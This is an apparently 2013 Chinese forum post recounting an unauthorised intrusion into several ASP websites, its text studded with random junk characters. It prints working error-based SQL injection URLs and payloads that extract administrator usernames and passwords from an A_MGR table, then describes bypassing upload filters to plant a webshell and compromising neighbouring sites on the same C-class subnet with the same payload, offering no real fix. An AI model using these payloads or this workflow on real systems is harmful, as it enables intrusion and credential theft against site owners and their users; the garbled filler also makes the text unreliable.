发现一个注入点' |& ^" m' g; c: { d2 u9 e7 y
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389. C& }7 {* g8 g
$ }$ B$ r% W, t4 M6 t% `: u习惯性的加’having1=1--
' L. U3 `9 m5 Q$ j3 k
; P" R+ E" h, E* thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
$ W y% V( c L/ J; g9 ?
- V- Z( c" Y3 V$ {0- d( o) Z! \ g7 p4 X4 u
# l; F% ?/ T5 G) y4 ]/ k" e8 q爆出Diary_A.dl_Title(这时候很激动啊)1 ]- R8 s% c9 C3 _3 f
4 H! a/ Z7 l* v4 V那么继续0 I' [3 d+ ?7 `) f: t
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—+ e" t. w4 K' T$ B
! j9 F6 |( a- K7 [5 Y继续,一直爆下去
* o9 L# c; L( \7 b2 s
* [9 X* n$ ?$ {* J2 E7 h3 Q爆到几个字段和表段 但是没找到需要的管理用户的字段+ s1 V. c7 `" G! o" a8 E
, J8 c4 A! F9 V @ T蛋疼了 怎么办 然后去后台登陆页看源码
9 O- b# A! a( x% J9 e8 c9 ?
7 g1 S2 P, [; ]4 g5 M0 ?- g6 F/ \05 d& s- R7 ]3 e) z; h% F/ V
- {# F1 G8 v! N: ]
Input name= “ADUID”6 {6 j+ J9 r8 ^3 z5 l* s/ D8 G9 O9 Y2 B
Input name= “ADPWD”8 R' }6 X( M# U' m) }. P$ l
$ X2 l0 `4 Z' h) j$ n: B2 d5 E
很幸运 找到了字段那就继续& ^# l& a* E, h* D
找到之后开始爆用户$ U- S+ ?/ \, o6 C
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—: Y y7 Q! w1 g9 R a0 ~
爆密码
; K5 W4 _! j$ D, i: I! E0 Dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—' V) s1 _1 {( s: d& T) B% [. Y b) V" ]% ~) u
测试了下 这个注入点只能爆到文章哪里的表
9 ?: H) q; ^* I: j, G4 {
3 T5 I+ Y) E' A- o4 A& n z }3 h头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了' i% e3 U, O. P
1 l' H& |) i* d0 U! K又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
5 X$ y" z% r, r# m* E
. I4 b% B' H; X% {( V/ X! ]4733 F) a) C4 e5 J; x9 \4 m
1 ~% ]+ A: `6 H9 }; j进后台, F7 O1 j3 n) r j4 k, B! ?
- f% @+ y! c+ g5 t: w$ b0 m
$ i9 \; e( W. O) i% n发现几个上传点 有的地方不能上传 而且防止恶意代码
7 T. j* X5 p4 R0 ^* A( k1 q; P
5 f( R5 ?' B- h j# S/ n- ^没办法 各种百度各种找大牛 找到一只好像可以突破的马
1 |) o; S( Z3 h7 N& G' H. s) a7 f: v, b! V6 ?% y- q
0 q$ R1 |6 ~5 L& C7 q9 d' Q在系统管理那里直接上传 不过没有显示地址
( {2 T6 ^" l5 w8 `- c U( t6 U# Z, w% e# X# p9 W
再上传一次 抓包 搞定OK5 m/ i9 w( u: H) E
+ S/ f/ D% R5 n, ^% [! \* Q* }1 i! j" B- E) q; q6 E
[6 A0 ]" q d# X
4721 b3 ~$ O. n4 ]# N, \
' V: a2 z0 ^' k; z X晚上不行了 去睡觉。。。1 f$ x, _8 l& X2 ?. n7 @" p& S1 X! u. U
第二天刚起床 闲的没事做继续日站吧
3 C' Q& P4 f( r0 t" E; E
. O$ C( A( a" c' r, C# B找个站 就把这个站的旁c扫了下' M: z* O1 ]3 \- G9 w7 S5 p
3 ]2 T+ Q# K+ j1 c N发现c段也有一个购物站 ,然后还和这个站的模板差不多( X, @8 s5 \8 _- l+ b
2 q& d8 [/ R/ x7 m6 n5 d0 s
就找到会员登录口测试" `( O( A& H6 e" H" @ D5 j
* \2 _$ t8 H5 y9 Q# j1 q: |' ?. C- `
'and (select top 1 MGR_UID from A_MGR)>0—" ?/ s M% l" A. q" J
果断爆到了 这时候我很激动 通杀
" J. P0 k/ T0 {9 n& W3 c. x
( t& W" Z; y( s4 \: j$ m9 s再次翻c段
$ h* E7 s( W, `: h, O+ W! F* ~- X7 ?$ b8 g, s
翻出几个站 都成功拿下3 G! W& s( A. p- P; Z
. S) j1 c+ A" l
7 Y& @* e+ i/ ~. i5 R0 C& p) }. G1 _; l1 y4 j( b+ h/ y
修复方案:
# |% P/ @- x/ P0 {他们比我专业
* Y. R/ B& T+ g
4 v4 T" K5 C: a ], n& G( W# c6 a
, p8 g, x% j- ^9 Z0 g& ~8 c8 H# R. f( O
) S8 E, P+ e4 }. ? |
发表于 2013-4-4 17:40:38
收藏
支持
反对